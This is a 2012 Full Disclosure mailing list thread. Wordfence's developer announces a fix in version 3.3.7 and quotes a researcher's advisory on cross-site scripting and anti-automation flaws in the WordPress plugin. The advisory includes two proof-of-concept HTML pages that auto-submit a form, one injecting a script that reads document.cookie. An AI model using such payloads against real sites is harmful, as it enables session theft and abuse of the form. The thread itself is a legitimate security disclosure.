Full Disclosure mailing list archives

Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress

From: Mark Maunder <mmaunder () gmail com>
Date: Fri, 19 Oct 2012 20:09:20 +0200

This has been fixed and the release just went out. Version 3.3.7.

The email param is now escaped and we've added rate limiting to the form
with a 3 minute backoff if the limit is exceeded.

http://wordpress.org/extend/plugins/wordfence/changelog/

Thanks for your report.

Regards,

Mark Maunder.



On Fri, Oct 19, 2012 at 7:16 PM, MustLive <mustlive () websecurity com ua>wrote:

Hello list!

I want to warn you about Cross-Site Scripting and Insufficient
Anti-automation vulnerabilities in Wordfence Security for WordPress.

Wordfence - it's security plugin for WordPress.

-------------------------
Affected products:
-------------------------

Vulnerable are Wordfence Security 3.3.5 and previous versions.

----------
Details:
----------

XSS (WASC-08):

Wordfence Security XSS.html

<html>
<head>
<title>Wordfence Security XSS exploit (C) 2012 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post">
<input type="hidden" name="email"
value="<script>alert(document.cookie)</script>">
</form>
</body>
</html>

Insufficient Anti-automation (WASC-21):

Wordfence Security IAA.html

<html>
<head>
<title>Wordfence Security IAA exploit (C) 2012 MustLive.
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/?_wfsf=unlockEmail"; method="post">
<input type="hidden" name="email" value="admin () e-mail com">
</form>
</body>
</html>

I've informed the plugin developer about vulnerabilities. And mentioned
about these vulnerabilities at my site (http://websecurity.com.ua/6106/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




-- 
Mark Maunder <mmaunder () gmail com>
France: (+33) 068-700-8029

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 19)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Philip Whitehouse (Oct 21)
  - Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Troy Rose (Oct 24)
- Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress Mark Maunder (Oct 21)
  - Re: XSS and IAA vulnerabilities in Wordfence Security for WordPress MustLive (Oct 26)